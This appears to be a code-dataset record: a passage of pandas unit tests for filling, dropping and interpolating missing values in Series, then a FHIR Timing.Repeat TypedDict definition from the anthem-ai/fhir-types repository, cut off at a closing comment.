100001, tzinfo=pytz.utc)])
assert_series_equal(filled, expected)
def test_fillna_downcast(self):
# GH 15277
# infer int64 from float64
s = pd.Series([1., np.nan])
result = s.fillna(0, downcast='infer')
expected = pd.Series([1, 0])
assert_series_equal(result, expected)
# infer int64 from float64 when fillna value is a dict
s = pd.Series([1., np.nan])
result = s.fillna({1: 0}, downcast='infer')
expected = pd.Series([1, 0])
assert_series_equal(result, expected)
def test_fillna_int(self):
s = Series(np.random.randint(-100, 100, 50))
s.fillna(method='ffill', inplace=True)
assert_series_equal(s.fillna(method='ffill', inplace=False), s)
def test_fillna_raise(self):
s = Series(np.random.randint(-100, 100, 50))
self.assertRaises(TypeError, s.fillna, [1, 2])
self.assertRaises(TypeError, s.fillna, (1, 2))
# related GH 9217, make sure limit is an int and greater than 0
s = Series([1, 2, 3, None])
for limit in [-1, 0, 1., 2.]:
for method in ['backfill', 'bfill', 'pad', 'ffill', None]:
with tm.assertRaises(ValueError):
s.fillna(1, limit=limit, method=method)
def test_fillna_nat(self):
series = Series([0, 1, 2, iNaT], dtype='M8[ns]')
filled = series.fillna(method='pad')
filled2 = series.fillna(value=series.values[2])
expected = series.copy()
expected.values[3] = expected.values[2]
assert_series_equal(filled, expected)
assert_series_equal(filled2, expected)
df = DataFrame({'A': series})
filled = df.fillna(method='pad')
filled2 = df.fillna(value=series.values[2])
expected = DataFrame({'A': expected})
assert_frame_equal(filled, expected)
assert_frame_equal(filled2, expected)
series = Series([iNaT, 0, 1, 2], dtype='M8[ns]')
filled = series.fillna(method='bfill')
filled2 = series.fillna(value=series[1])
expected = series.copy()
expected[0] = expected[1]
assert_series_equal(filled, expected)
assert_series_equal(filled2, expected)
df = DataFrame({'A': series})
filled = df.fillna(method='bfill')
filled2 = df.fillna(value=series[1])
expected = DataFrame({'A': expected})
assert_frame_equal(filled, expected)
assert_frame_equal(filled2, expected)
def test_isnull_for_inf(self):
s = Series(['a', np.inf, np.nan, 1.0])
with pd.option_context('mode.use_inf_as_null', True):
r = s.isnull()
dr = s.dropna()
e = Series([False, True, True, False])
de = Series(['a', 1.0], index=[0, 3])
tm.assert_series_equal(r, e)
tm.assert_series_equal(dr, de)
def test_fillna(self):
ts = Series([0., 1., 2., 3., 4.], index=tm.makeDateIndex(5))
self.assert_series_equal(ts, ts.fillna(method='ffill'))
ts[2] = np.NaN
exp = Series([0., 1., 1., 3., 4.], index=ts.index)
self.assert_series_equal(ts.fillna(method='ffill'), exp)
exp = Series([0., 1., 3., 3., 4.], index=ts.index)
self.assert_series_equal(ts.fillna(method='backfill'), exp)
exp = Series([0., 1., 5., 3., 4.], index=ts.index)
self.assert_series_equal(ts.fillna(value=5), exp)
self.assertRaises(ValueError, ts.fillna)
self.assertRaises(ValueError, self.ts.fillna, value=0, method='ffill')
# GH 5703
s1 = Series([np.nan])
s2 = Series([1])
result = s1.fillna(s2)
expected = Series([1.])
assert_series_equal(result, expected)
result = s1.fillna({})
assert_series_equal(result, s1)
result = s1.fillna(Series(()))
assert_series_equal(result, s1)
result = s2.fillna(s1)
assert_series_equal(result, s2)
result = s1.fillna({0: 1})
assert_series_equal(result, expected)
result = s1.fillna({1: 1})
assert_series_equal(result, Series([np.nan]))
result = s1.fillna({0: 1, 1: 1})
assert_series_equal(result, expected)
result = s1.fillna(Series({0: 1, 1: 1}))
assert_series_equal(result, expected)
result = s1.fillna(Series({0: 1, 1: 1}, index=[4, 5]))
assert_series_equal(result, s1)
s1 = Series([0, 1, 2], list('abc'))
s2 = Series([0, np.nan, 2], list('bac'))
result = s2.fillna(s1)
expected = Series([0, 0, 2.], list('bac'))
assert_series_equal(result, expected)
# limit
s = Series(np.nan, index=[0, 1, 2])
result = s.fillna(999, limit=1)
expected = Series([999, np.nan, np.nan], index=[0, 1, 2])
assert_series_equal(result, expected)
result = s.fillna(999, limit=2)
expected = Series([999, 999, np.nan], index=[0, 1, 2])
assert_series_equal(result, expected)
# GH 9043
# make sure a string representation of int/float values can be filled
# correctly without raising errors or being converted
vals = ['0', '1.5', '-0.3']
for val in vals:
s = Series([0, 1, np.nan, np.nan, 4], dtype='float64')
result = s.fillna(val)
expected = Series([0, 1, val, val, 4], dtype='object')
assert_series_equal(result, expected)
def test_fillna_bug(self):
x = Series([nan, 1., nan, 3., nan], ['z', 'a', 'b', 'c', 'd'])
filled = x.fillna(method='ffill')
expected = Series([nan, 1., 1., 3., 3.], x.index)
assert_series_equal(filled, expected)
filled = x.fillna(method='bfill')
expected = Series([1., 1., 3., 3., nan], x.index)
assert_series_equal(filled, expected)
def test_fillna_inplace(self):
x = Series([nan, 1., nan, 3., nan], ['z', 'a', 'b', 'c', 'd'])
y = x.copy()
y.fillna(value=0, inplace=True)
expected = x.fillna(value=0)
assert_series_equal(y, expected)
def test_fillna_invalid_method(self):
try:
self.ts.fillna(method='ffil')
except ValueError as inst:
self.assertIn('ffil', str(inst))
def test_ffill(self):
ts = Series([0., 1., 2., 3., 4.], index=tm.makeDateIndex(5))
ts[2] = np.NaN
assert_series_equal(ts.ffill(), ts.fillna(method='ffill'))
def test_ffill_mixed_dtypes_without_missing_data(self):
# GH14956
series = pd.Series([datetime(2015, 1, 1, tzinfo=pytz.utc), 1])
result = series.ffill()
assert_series_equal(series, result)
def test_bfill(self):
ts = Series([0., 1., 2., 3., 4.], index=tm.makeDateIndex(5))
ts[2] = np.NaN
assert_series_equal(ts.bfill(), ts.fillna(method='bfill'))
def test_timedelta64_nan(self):
td = Series([timedelta(days=i) for i in range(10)])
# nan ops on timedeltas
td1 = td.copy()
td1[0] = np.nan
self.assertTrue(isnull(td1[0]))
self.assertEqual(td1[0].value, iNaT)
td1[0] = td[0]
self.assertFalse(isnull(td1[0]))
td1[1] = iNaT
self.assertTrue(isnull(td1[1]))
self.assertEqual(td1[1].value, iNaT)
td1[1] = td[1]
self.assertFalse(isnull(td1[1]))
td1[2] = NaT
self.assertTrue(isnull(td1[2]))
self.assertEqual(td1[2].value, iNaT)
td1[2] = td[2]
self.assertFalse(isnull(td1[2]))
# boolean setting
# this doesn't work, not sure numpy even supports it
# result = td[(td>np.timedelta64(timedelta(days=3))) &
# td<np.timedelta64(timedelta(days=7)))] = np.nan
# self.assertEqual(isnull(result).sum(), 7)
    # NumPy limitation =(
# def test_logical_range_select(self):
# np.random.seed(12345)
# selector = -0.5 <= self.ts <= 0.5
# expected = (self.ts >= -0.5) & (self.ts <= 0.5)
# assert_series_equal(selector, expected)
def test_dropna_empty(self):
s = Series([])
self.assertEqual(len(s.dropna()), 0)
s.dropna(inplace=True)
self.assertEqual(len(s), 0)
# invalid axis
self.assertRaises(ValueError, s.dropna, axis=1)
def test_datetime64_tz_dropna(self):
# DatetimeBlock
s = Series([Timestamp('2011-01-01 10:00'), pd.NaT, Timestamp(
'2011-01-03 10:00'), pd.NaT])
result = s.dropna()
expected = Series([Timestamp('2011-01-01 10:00'),
Timestamp('2011-01-03 10:00')], index=[0, 2])
self.assert_series_equal(result, expected)
# DatetimeBlockTZ
idx = pd.DatetimeIndex(['2011-01-01 10:00', pd.NaT,
'2011-01-03 10:00', pd.NaT],
tz='Asia/Tokyo')
s = pd.Series(idx)
self.assertEqual(s.dtype, 'datetime64[ns, Asia/Tokyo]')
result = s.dropna()
expected = Series([Timestamp('2011-01-01 10:00', tz='Asia/Tokyo'),
Timestamp('2011-01-03 10:00', tz='Asia/Tokyo')],
index=[0, 2])
self.assertEqual(result.dtype, 'datetime64[ns, Asia/Tokyo]')
self.assert_series_equal(result, expected)
def test_dropna_no_nan(self):
for s in [Series([1, 2, 3], name='x'), Series(
[False, True, False], name='x')]:
result = s.dropna()
self.assert_series_equal(result, s)
self.assertFalse(result is s)
s2 = s.copy()
s2.dropna(inplace=True)
self.assert_series_equal(s2, s)
def test_valid(self):
ts = self.ts.copy()
ts[::2] = np.NaN
result = ts.valid()
self.assertEqual(len(result), ts.count())
tm.assert_series_equal(result, ts[1::2])
tm.assert_series_equal(result, ts[pd.notnull(ts)])
def test_isnull(self):
ser = Series([0, 5.4, 3, nan, -0.001])
np.array_equal(ser.isnull(),
Series([False, False, False, True, False]).values)
ser = Series(["hi", "", nan])
np.array_equal(ser.isnull(), Series([False, False, True]).values)
def test_notnull(self):
ser = Series([0, 5.4, 3, nan, -0.001])
np.array_equal(ser.notnull(),
Series([True, True, True, False, True]).values)
ser = Series(["hi", "", nan])
np.array_equal(ser.notnull(), Series([True, True, False]).values)
def test_pad_nan(self):
x = Series([np.nan, 1., np.nan, 3., np.nan], ['z', 'a', 'b', 'c', 'd'],
dtype=float)
x.fillna(method='pad', inplace=True)
expected = Series([np.nan, 1.0, 1.0, 3.0, 3.0],
['z', 'a', 'b', 'c', 'd'], dtype=float)
assert_series_equal(x[1:], expected[1:])
self.assertTrue(np.isnan(x[0]), np.isnan(expected[0]))
def test_pad_require_monotonicity(self):
rng = date_range('1/1/2000', '3/1/2000', freq='B')
# neither monotonic increasing or decreasing
rng2 = rng[[1, 0, 2]]
self.assertRaises(ValueError, rng2.get_indexer, rng, method='pad')
def test_dropna_preserve_name(self):
self.ts[:5] = np.nan
result = self.ts.dropna()
self.assertEqual(result.name, self.ts.name)
name = self.ts.name
ts = self.ts.copy()
ts.dropna(inplace=True)
self.assertEqual(ts.name, name)
def test_fill_value_when_combine_const(self):
# GH12723
s = Series([0, 1, np.nan, 3, 4, 5])
exp = s.fillna(0).add(2)
res = s.add(2, fill_value=0)
assert_series_equal(res, exp)
def test_series_fillna_limit(self):
index = np.arange(10)
s = Series(np.random.randn(10), index=index)
result = s[:2].reindex(index)
result = result.fillna(method='pad', limit=5)
expected = s[:2].reindex(index).fillna(method='pad')
expected[-3:] = np.nan
assert_series_equal(result, expected)
result = s[-2:].reindex(index)
result = result.fillna(method='bfill', limit=5)
expected = s[-2:].reindex(index).fillna(method='backfill')
expected[:3] = np.nan
assert_series_equal(result, expected)
def test_sparse_series_fillna_limit(self):
index = np.arange(10)
s = Series(np.random.randn(10), index=index)
ss = s[:2].reindex(index).to_sparse()
result = ss.fillna(method='pad', limit=5)
expected = ss.fillna(method='pad', limit=5)
expected = expected.to_dense()
expected[-3:] = np.nan
expected = expected.to_sparse()
assert_series_equal(result, expected)
ss = s[-2:].reindex(index).to_sparse()
result = ss.fillna(method='backfill', limit=5)
expected = ss.fillna(method='backfill')
expected = expected.to_dense()
expected[:3] = np.nan
expected = expected.to_sparse()
assert_series_equal(result, expected)
def test_sparse_series_pad_backfill_limit(self):
index = np.arange(10)
s = Series(np.random.randn(10), index=index)
s = s.to_sparse()
result = s[:2].reindex(index, method='pad', limit=5)
expected = s[:2].reindex(index).fillna(method='pad')
expected = expected.to_dense()
expected[-3:] = np.nan
expected = expected.to_sparse()
assert_series_equal(result, expected)
result = s[-2:].reindex(index, method='backfill', limit=5)
expected = s[-2:].reindex(index).fillna(method='backfill')
expected = expected.to_dense()
expected[:3] = np.nan
expected = expected.to_sparse()
assert_series_equal(result, expected)
def test_series_pad_backfill_limit(self):
index = np.arange(10)
s = Series(np.random.randn(10), index=index)
result = s[:2].reindex(index, method='pad', limit=5)
expected = s[:2].reindex(index).fillna(method='pad')
expected[-3:] = np.nan
assert_series_equal(result, expected)
result = s[-2:].reindex(index, method='backfill', limit=5)
expected = s[-2:].reindex(index).fillna(method='backfill')
expected[:3] = np.nan
assert_series_equal(result, expected)
class TestSeriesInterpolateData(TestData, tm.TestCase):
def test_interpolate(self):
ts = Series(np.arange(len(self.ts), dtype=float), self.ts.index)
ts_copy = ts.copy()
ts_copy[5:10] = np.NaN
linear_interp = ts_copy.interpolate(method='linear')
self.assert_series_equal(linear_interp, ts)
ord_ts = Series([d.toordinal() for d in self.ts.index],
index=self.ts.index).astype(float)
ord_ts_copy = ord_ts.copy()
ord_ts_copy[5:10] = np.NaN
time_interp = ord_ts_copy.interpolate(method='time')
self.assert_series_equal(time_interp, ord_ts)
# try time interpolation on a non-TimeSeries
# Only raises ValueError if there are NaNs.
non_ts = self.series.copy()
non_ts[0] = np.NaN
self.assertRaises(ValueError, non_ts.interpolate, method='time')
def test_interpolate_pchip(self):
tm._skip_if_no_scipy()
_skip_if_no_pchip()
ser = Series(np.sort(np.random.uniform(size=100)))
# interpolate at new_index
new_index = ser.index.union(Index([49.25, 49.5, 49.75, 50.25, 50.5,
50.75]))
interp_s = ser.reindex(new_index).interpolate(method='pchip')
# does not blow up, GH5977
interp_s[49:51]
def test_interpolate_akima(self):
tm._skip_if_no_scipy()
_skip_if_no_akima()
ser = Series([10, 11, 12, 13])
expected = Series([11.00, 11.25, 11.50, 11.75,
12.00, 12.25, 12.50, 12.75, 13.00],
index=Index([1.0, 1.25, 1.5, 1.75,
2.0, 2.25, 2.5, 2.75, 3.0]))
# interpolate at new_index
new_index = ser.index.union(Index([1.25, 1.5, 1.75, 2.25, 2.5, 2.75]))
interp_s = ser.reindex(new_index).interpolate(method='akima')
assert_series_equal(interp_s[1:3], expected)
def test_interpolate_piecewise_polynomial(self):
tm._skip_if_no_scipy()
ser = Series([10, 11, 12, 13])
expected = Series([11.00, 11.25, 11.50, 11.75,
12.00, 12.25, 12.50, 12.75, 13.00],
index=Index([1.0, 1.25, 1.5, 1.75,
2.0, 2.25, 2.5, 2.75, 3.0]))
# interpolate at new_index
new_index = ser.index.union(Index([1.25, 1.5, 1.75, 2.25, 2.5, 2.75]))
interp_s = ser.reindex(new_index).interpolate(
method='piecewise_polynomial')
assert_series_equal(interp_s[1:3], expected)
def test_interpolate_from_derivatives(self):
tm._skip_if_no_scipy()
ser = Series([10, 11, 12, 13])
expected = Series([11.00, 11.25, 11.50, 11.75,
12.00, 12.25, 12.50, 12.75, 13.00],
index=Index([1.0, 1.25, 1.5, 1.75,
2.0, 2.25, 2.5, 2.75, 3.0]))
# interpolate at new_index
new_index = ser.index.union(Index([1.25, 1.5, 1.75, 2.25, 2.5, 2.75]))
interp_s = ser.reindex(new_index).interpolate(
method='from_derivatives')
assert_series_equal(interp_s[1:3], expected)
def test_interpolate_corners(self):
s = Series([np.nan, np.nan])
assert_series_equal(s.interpolate(), s)
s = Series([]).interpolate()
assert_series_equal(s.interpolate(), s)
tm._skip_if_no_scipy()
s = Series([np.nan, np.nan])
assert_series_equal(s.interpolate(method='polynomial', order=1), s)
s = Series([]).interpolate()
assert_series_equal(s.interpolate(method='polynomial', order=1), s)
def test_interpolate_index_values(self):
s = Series(np.nan, index=np.sort(np.random.rand(30)))
s[::3] = np.random.randn(10)
vals = s.index.values.astype(float)
result = s.interpolate(method='index')
expected = s.copy()
bad = isnull(expected.values)
good = ~bad
expected = Series(np.interp(vals[bad], vals[good],
s.values[good]),
index=s.index[bad])
assert_series_equal(result[bad], expected)
# 'values' is synonymous with 'index' for the method kwarg
other_result = s.interpolate(method='values')
assert_series_equal(other_result, result)
assert_series_equal(other_result[bad], expected)
def test_interpolate_non_ts(self):
s = Series([1, 3, np.nan, np.nan, np.nan, 11])
with tm.assertRaises(ValueError):
s.interpolate(method='time')
# New interpolation tests
def test_nan_interpolate(self):
s = Series([0, 1, np.nan, 3])
result = s.interpolate()
expected = Series([0., 1., 2., 3.])
assert_series_equal(result, expected)
tm._skip_if_no_scipy()
result = s.interpolate(method='polynomial', order=1)
assert_series_equal(result, expected)
def test_nan_irregular_index(self):
s = Series([1, 2, np.nan, 4], index=[1, 3, 5, 9])
result = s.interpolate()
expected = Series([1., 2., 3., 4.], index=[1, 3, 5, 9])
assert_series_equal(result, expected)
def test_nan_str_index(self):
s = Series([0, 1, 2, np.nan], index=list('abcd'))
result = s.interpolate()
expected = Series([0., 1., 2., 2.], index=list('abcd'))
assert_series_equal(result, expected)
def test_interp_quad(self):
tm._skip_if_no_scipy()
sq = Series([1, 4, np.nan, 16], index=[1, 2, 3, 4])
result = sq.interpolate(method='quadratic')
expected = Series([1., 4., 9., 16.], index=[1, 2, 3, 4])
assert_series_equal(result, expected)
def test_interp_scipy_basic(self):
tm._skip_if_no_scipy()
s = Series([1, 3, np.nan, 12, np.nan, 25])
# slinear
expected = Series([1., 3., 7.5, 12., 18.5, 25.])
result = s.interpolate(method='slinear')
assert_series_equal(result, expected)
result = s.interpolate(method='slinear', downcast='infer')
assert_series_equal(result, expected)
# nearest
expected = Series([1, 3, 3, 12, 12, 25])
result = s.interpolate(method='nearest')
assert_series_equal(result, expected.astype('float'))
result = s.interpolate(method='nearest', downcast='infer')
assert_series_equal(result, expected)
# zero
expected = Series([1, 3, 3, 12, 12, 25])
result = s.interpolate(method='zero')
assert_series_equal(result, expected.astype('float'))
result = s.interpolate(method='zero', downcast='infer')
assert_series_equal(result, expected)
# quadratic
# GH #15662.
# new cubic and quadratic interpolation algorithms from scipy 0.19.0.
# previously `splmake` was used. See scipy/scipy#6710
if _is_scipy_ge_0190:
expected = Series([1, 3., 6.823529, 12., 18.058824, 25.])
else:
expected = Series([1, 3., 6.769231, 12., 18.230769, 25.])
result = s.interpolate(method='quadratic')
assert_series_equal(result, expected)
result = s.interpolate(method='quadratic', downcast='infer')
assert_series_equal(result, expected)
# cubic
expected = Series([1., 3., 6.8, 12., 18.2, 25.])
result = s.interpolate(method='cubic')
assert_series_equal(result, expected)
def test_interp_limit(self):
s = Series([1, 3, np.nan, np.nan, np.nan, 11])
expected = Series([1., 3., 5., 7., np.nan, 11.])
result = s.interpolate(method='linear', limit=2)
assert_series_equal(result, expected)
# GH 9217, make sure limit is an int and greater than 0
methods = ['linear', 'time', 'index', 'values', 'nearest', 'zero',
'slinear', 'quadratic', 'cubic', 'barycentric', 'krogh',
'polynomial', 'spline', 'piecewise_polynomial', None,
'from_derivatives', 'pchip', 'akima']
s = pd.Series([1, 2, np.nan, np.nan, 5])
for limit in [-1, 0, 1., 2.]:
for method in methods:
with tm.assertRaises(ValueError):
s.interpolate(limit=limit, method=method)
def test_interp_limit_forward(self):
s = Series([1, 3, np.nan, np.nan, np.nan, 11])
# Provide 'forward' (the default) explicitly here.
expected = Series([1., 3., 5., 7., np.nan, 11.])
result = s.interpolate(method='linear', limit=2,
limit_direction='forward')
assert_series_equal(result, expected)
result = s.interpolate(method='linear', limit=2,
limit_direction='FORWARD')
assert_series_equal(result, expected)
def test_interp_limit_bad_direction(self):
s = Series([1, 3, np.nan, np.nan, np.nan, 11])
self.assertRaises(ValueError, s.interpolate, method='linear', limit=2,
limit_direction='abc')
# raises an error even if no limit is specified.
self.assertRaises(ValueError, s.interpolate, method='linear',
limit_direction='abc')
def test_interp_limit_direction(self):
# These tests are for issue #9218 -- fill NaNs in both directions.
s = Series([1, 3, np.nan, np.nan, np.nan, 11])
expected = Series([1., 3., np.nan, 7., 9., 11.])
result = s.interpolate(method='linear', limit=2,
limit_direction='backward')
assert_series_equal(result, expected)
expected = Series([1., 3., 5., np.nan, 9., 11.])
result = s.interpolate(method='linear', limit=1,
limit_direction='both')
assert_series_equal(result, expected)
# Check that this works on a longer series of nans.
s = Series([1, 3, np.nan, np.nan, np.nan, 7, 9, np.nan, np.nan, 12,
np.nan])
expected = Series([1., 3., 4., 5., 6., 7., 9., 10., 11., 12., 12.])
result = s.interpolate(method='linear', limit=2,
limit_direction='both')
assert_series_equal(result, expected)
expected = Series([1., 3., 4., np.nan, 6., 7., 9., 10., 11., 12., 12.])
result = s.interpolate(method='linear', limit=1,
limit_direction='both')
assert_series_equal(result, expected)
def test_interp_limit_to_ends(self):
        # These tests are for issue #10420 -- flow back to beginning.
s = Series([np.nan, np.nan, 5, 7, 9, np.nan])
expected = Series([5., 5., 5., 7., 9., np.nan])
result = s.interpolate(method='linear', limit=2,
limit_direction='backward')
assert_series_equal(result, expected)
expected = Series([5., 5., 5., 7., 9., 9.])
result = s.interpolate(method='linear', limit=2,
limit_direction='both')
assert_series_equal(result, expected)
def test_interp_limit_before_ends(self):
        # These tests are for issue #11115 -- limit ends properly.
s = Series([np.nan, np.nan, 5, 7, np.nan, np.nan])
expected = Series([np.nan, np.nan, 5., 7., 7., np.nan])
result = s.interpolate(method='linear', limit=1,
limit_direction='forward')
assert_series_equal(result, expected)
expected = Series([np.nan, 5., 5., 7., np.nan, np.nan])
result = s.interpolate(method='linear', limit=1,
limit_direction='backward')
assert_series_equal(result, expected)
expected = Series([np.nan, 5., 5., 7., 7., np.nan])
result = s.interpolate(method='linear', limit=1,
limit_direction='both')
assert_series_equal(result, expected)
def test_interp_all_good(self):
# scipy
tm._skip_if_no_scipy()
s = Series([1, 2, 3])
result = s.interpolate(method='polynomial', order=1)
assert_series_equal(result, s)
# non-scipy
result = s.interpolate()
assert_series_equal(result, s)
def test_interp_multiIndex(self):
idx = MultiIndex.from_tuples([(0, 'a'), (1, 'b'), (2, 'c')])
s = Series([1, 2, np.nan], index=idx)
expected = s.copy()
expected.loc[2] = 2
result = s.interpolate()
assert_series_equal(result, expected)
tm._skip_if_no_scipy()
with tm.assertRaises(ValueError):
s.interpolate(method='polynomial', order=1)
def test_interp_nonmono_raise(self):
tm._skip_if_no_scipy()
s = Series([1, np.nan, 3], index=[0, 2, 1])
with tm.assertRaises(ValueError):
s.interpolate(method='krogh')
def test_interp_datetime64(self):
tm._skip_if_no_scipy()
df = Series([1, np.nan, 3], index=date_range('1/1/2000', periods=3))
result = df.interpolate(method='nearest')
expected = Series([1., 1., 3.],
index=date_range('1/1/2000', periods=3))
assert_series_equal(result, expected)
def test_interp_limit_no_nans(self):
# GH 7173
s = pd.Series([1., 2., 3.])
result = s.interpolate(limit=1)
expected = s
assert_series_equal(result, expected)
def test_no_order(self):
tm._skip_if_no_scipy()
s = Series([0, 1, np.nan, 3])
with tm.assertRaises(ValueError):
s.interpolate(method='polynomial')
with tm.assertRaises(ValueError):
s.interpolate(method='spline')
def test_spline(self):
tm._skip_if_no_scipy()
s = Series([1, 2, np.nan, 4, 5, np.nan, 7])
result = s.interpolate(method='spline', order=1)
expected = Series([1., 2., 3., 4., 5., 6., 7.])
assert_series_equal(result, expected)
def test_spline_extrapolate(self):
tm.skip_if_no_package(
'scipy', min_version='0.15',
app='setting ext on scipy.interpolate.UnivariateSpline')
s = Series([1, 2, 3, 4, np.nan, 6, np.nan])
result3 = s.interpolate(method='spline', order=1, ext=3)
expected3 = Series([1., 2., 3., 4., 5., 6., 6.])
assert_series_equal(result3, expected3)
result1 = s.interpolate(method='spline', order=1, ext=0)
expected1 = Series([1., 2., 3., 4., 5., 6., 7.])
assert_series_equal(result1, expected1)
def test_spline_smooth(self):
tm._skip_if_no_scipy()
s = Series([1, 2, np.nan, 4, 5.1, np.nan, 7])
self.assertNotEqual(s.interpolate(method='spline', order=3, s=0)[5],
s.interpolate(method='spline', order=3)[5])
def test_spline_interpolation(self):
tm._skip_if_no_scipy()
s = Series(np.arange(10) ** 2)
s[np.random.randint(0, 9, 3)] = np.nan
result1 = s.interpolate(method='spline', order=1)
expected1 = s.interpolate(method='spline', order=1)
assert_series_equal(result1, expected1)
# GH #10633
def test_spline_error(self):
tm._skip_if_no_scipy()
s = pd.Series(np.arange(10) ** 2)
s[np.random.randint(0, 9, 3)] = np.nan
with tm.assertRaises(ValueError):
s.interpolate(method='spline')
with tm.assertRaises(ValueError):
s.interpolate(method='spline', order=0)
def test_interp_timedelta64(self):
# GH 6424
df = Series([1, np.nan, 3],
index=pd.to_timedelta([1, 2, 3]))
result = df.interpolate(method='time')
expected = Series([1., 2., 3.],
index=pd.to_timedelta([1, 2, 3]))
assert_series_equal(result, expected)
# test for non uniform spacing
df = Series([1, np.nan, 3],
index=pd.to_timedelta([1, 2, 4]))
result = df.interpolate(method='time')
expected = Series([1., 1.666667, 3.],
index=pd.to_timedelta([1, 2, 4]))
assert_series_equal(result, expected)
def test_series_interpolate_method_values(self):
# #1646
ts = _simple_ts('1/1/2000', '1/20/2000')
ts[::2] = np.nan
result = ts.interpolate(method='values')
exp = ts.interpolate()
assert_series_equal(result, exp)
def test_series_interpolate_intraday(self):
# #1698
index = pd.date_range('1/1/2012', periods=4, freq='12D')
ts = pd.Series([0, 12, 24, 36], index)
new_index = index.append(index + pd.DateOffset(days=1)).sort_values()
exp = ts.reindex(new_index).interpolate(method='time')
index = pd.date_range('1/1/2012', periods=4, freq='12H')
ts = pd.Series([0, 12, 24, 36], index)
new_index = index.append(index + pd.DateOffset(hours=1)).sort_values()
result = ts.reindex(new_index).interpolate(method='time')
self.assert_numpy_array_equal(result.values, exp.values)
| 38.693405
| 79
| 0.559105
|
d309f3ef579b4a8841bbb440e44e17d881833e60
| 7,230
|
py
|
Python
|
src/fhir_types/FHIR_Timing_Repeat.py
|
anthem-ai/fhir-types
|
42348655fb3a9b3f131b911d6bc0782da8c14ce4
|
[
"Apache-2.0"
] | 2
|
2022-02-03T00:51:30.000Z
|
2022-02-03T18:42:43.000Z
|
src/fhir_types/FHIR_Timing_Repeat.py
|
anthem-ai/fhir-types
|
42348655fb3a9b3f131b911d6bc0782da8c14ce4
|
[
"Apache-2.0"
] | null | null | null |
src/fhir_types/FHIR_Timing_Repeat.py
|
anthem-ai/fhir-types
|
42348655fb3a9b3f131b911d6bc0782da8c14ce4
|
[
"Apache-2.0"
] | null | null | null |
from typing import Any, List, Literal, TypedDict
from .FHIR_code import FHIR_code
from .FHIR_decimal import FHIR_decimal
from .FHIR_Duration import FHIR_Duration
from .FHIR_Element import FHIR_Element
from .FHIR_Period import FHIR_Period
from .FHIR_positiveInt import FHIR_positiveInt
from .FHIR_Range import FHIR_Range
from .FHIR_string import FHIR_string
from .FHIR_time import FHIR_time
from .FHIR_unsignedInt import FHIR_unsignedInt
# Specifies an event that may occur multiple times. Timing schedules are used to record when things are planned, expected or requested to occur. The most common usage is in dosage instructions for medications. They are also used when planning care of various kinds, and may be used for reporting the schedule to which past regular activities were carried out.
FHIR_Timing_Repeat = TypedDict(
"FHIR_Timing_Repeat",
{
# Unique id for the element within a resource (for internal references). This may be any string value that does not contain spaces.
"id": FHIR_string,
# May be used to represent additional information that is not part of the basic definition of the element. To make the use of extensions safe and manageable, there is a strict set of governance applied to the definition and use of extensions. Though any implementer can define an extension, there is a set of requirements that SHALL be met as part of the definition of the extension.
"extension": List[Any],
# May be used to represent additional information that is not part of the basic definition of the element and that modifies the understanding of the element in which it is contained and/or the understanding of the containing element's descendants. Usually modifier elements provide negation or qualification. To make the use of extensions safe and manageable, there is a strict set of governance applied to the definition and use of extensions. Though any implementer can define an extension, there is a set of requirements that SHALL be met as part of the definition of the extension. Applications processing a resource are required to check for modifier extensions.Modifier extensions SHALL NOT change the meaning of any elements on Resource or DomainResource (including cannot change the meaning of modifierExtension itself).
"modifierExtension": List[Any],
# Either a duration for the length of the timing schedule, a range of possible length, or outer bounds for start and/or end limits of the timing schedule.
"boundsDuration": FHIR_Duration,
# Either a duration for the length of the timing schedule, a range of possible length, or outer bounds for start and/or end limits of the timing schedule.
"boundsRange": FHIR_Range,
# Either a duration for the length of the timing schedule, a range of possible length, or outer bounds for start and/or end limits of the timing schedule.
"boundsPeriod": FHIR_Period,
# A total count of the desired number of repetitions across the duration of the entire timing specification. If countMax is present, this element indicates the lower bound of the allowed range of count values.
"count": FHIR_positiveInt,
# Extensions for count
"_count": FHIR_Element,
# If present, indicates that the count is a range - so to perform the action between [count] and [countMax] times.
"countMax": FHIR_positiveInt,
# Extensions for countMax
"_countMax": FHIR_Element,
# How long this thing happens for when it happens. If durationMax is present, this element indicates the lower bound of the allowed range of the duration.
"duration": FHIR_decimal,
# Extensions for duration
"_duration": FHIR_Element,
# If present, indicates that the duration is a range - so to perform the action between [duration] and [durationMax] time length.
"durationMax": FHIR_decimal,
# Extensions for durationMax
"_durationMax": FHIR_Element,
# The units of time for the duration, in UCUM units.
"durationUnit": Literal["s", "min", "h", "d", "wk", "mo", "a"],
# Extensions for durationUnit
"_durationUnit": FHIR_Element,
# The number of times to repeat the action within the specified period. If frequencyMax is present, this element indicates the lower bound of the allowed range of the frequency.
"frequency": FHIR_positiveInt,
# Extensions for frequency
"_frequency": FHIR_Element,
# If present, indicates that the frequency is a range - so to repeat between [frequency] and [frequencyMax] times within the period or period range.
"frequencyMax": FHIR_positiveInt,
# Extensions for frequencyMax
"_frequencyMax": FHIR_Element,
# Indicates the duration of time over which repetitions are to occur; e.g. to express "3 times per day", 3 would be the frequency and "1 day" would be the period. If periodMax is present, this element indicates the lower bound of the allowed range of the period length.
"period": FHIR_decimal,
# Extensions for period
"_period": FHIR_Element,
        # If present, indicates that the period is a range from [period] to [periodMax], allowing expression of concepts such as "do this once every 3-5 days".
"periodMax": FHIR_decimal,
# Extensions for periodMax
"_periodMax": FHIR_Element,
# The units of time for the period in UCUM units.
"periodUnit": Literal["s", "min", "h", "d", "wk", "mo", "a"],
# Extensions for periodUnit
"_periodUnit": FHIR_Element,
# If one or more days of week is provided, then the action happens only on the specified day(s).
"dayOfWeek": List[FHIR_code],
# Extensions for dayOfWeek
"_dayOfWeek": List[FHIR_Element],
# Specified time of day for action to take place.
"timeOfDay": List[FHIR_time],
# Extensions for timeOfDay
"_timeOfDay": List[FHIR_Element],
# An approximate time period during the day, potentially linked to an event of daily living that indicates when the action should occur.
"when": List[
Literal[
"MORN",
"MORN.early",
"MORN.late",
"NOON",
"AFT",
"AFT.early",
"AFT.late",
"EVE",
"EVE.early",
"EVE.late",
"NIGHT",
"PHS",
"HS",
"WAKE",
"C",
"CM",
"CD",
"CV",
"AC",
"ACM",
"ACD",
"ACV",
"PC",
"PCM",
"PCD",
"PCV",
]
],
# Extensions for when
"_when": List[FHIR_Element],
# The number of minutes from the event. If the event code does not indicate whether the minutes is before or after the event, then the offset is assumed to be after the event.
"offset": FHIR_unsignedInt,
# Extensions for offset
"_offset": FHIR_Element,
},
total=False,
)
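# A minimal usage sketch (not part of the FHIR type definitions above; the
# variable name `example_repeat` and its values are hypothetical): because the
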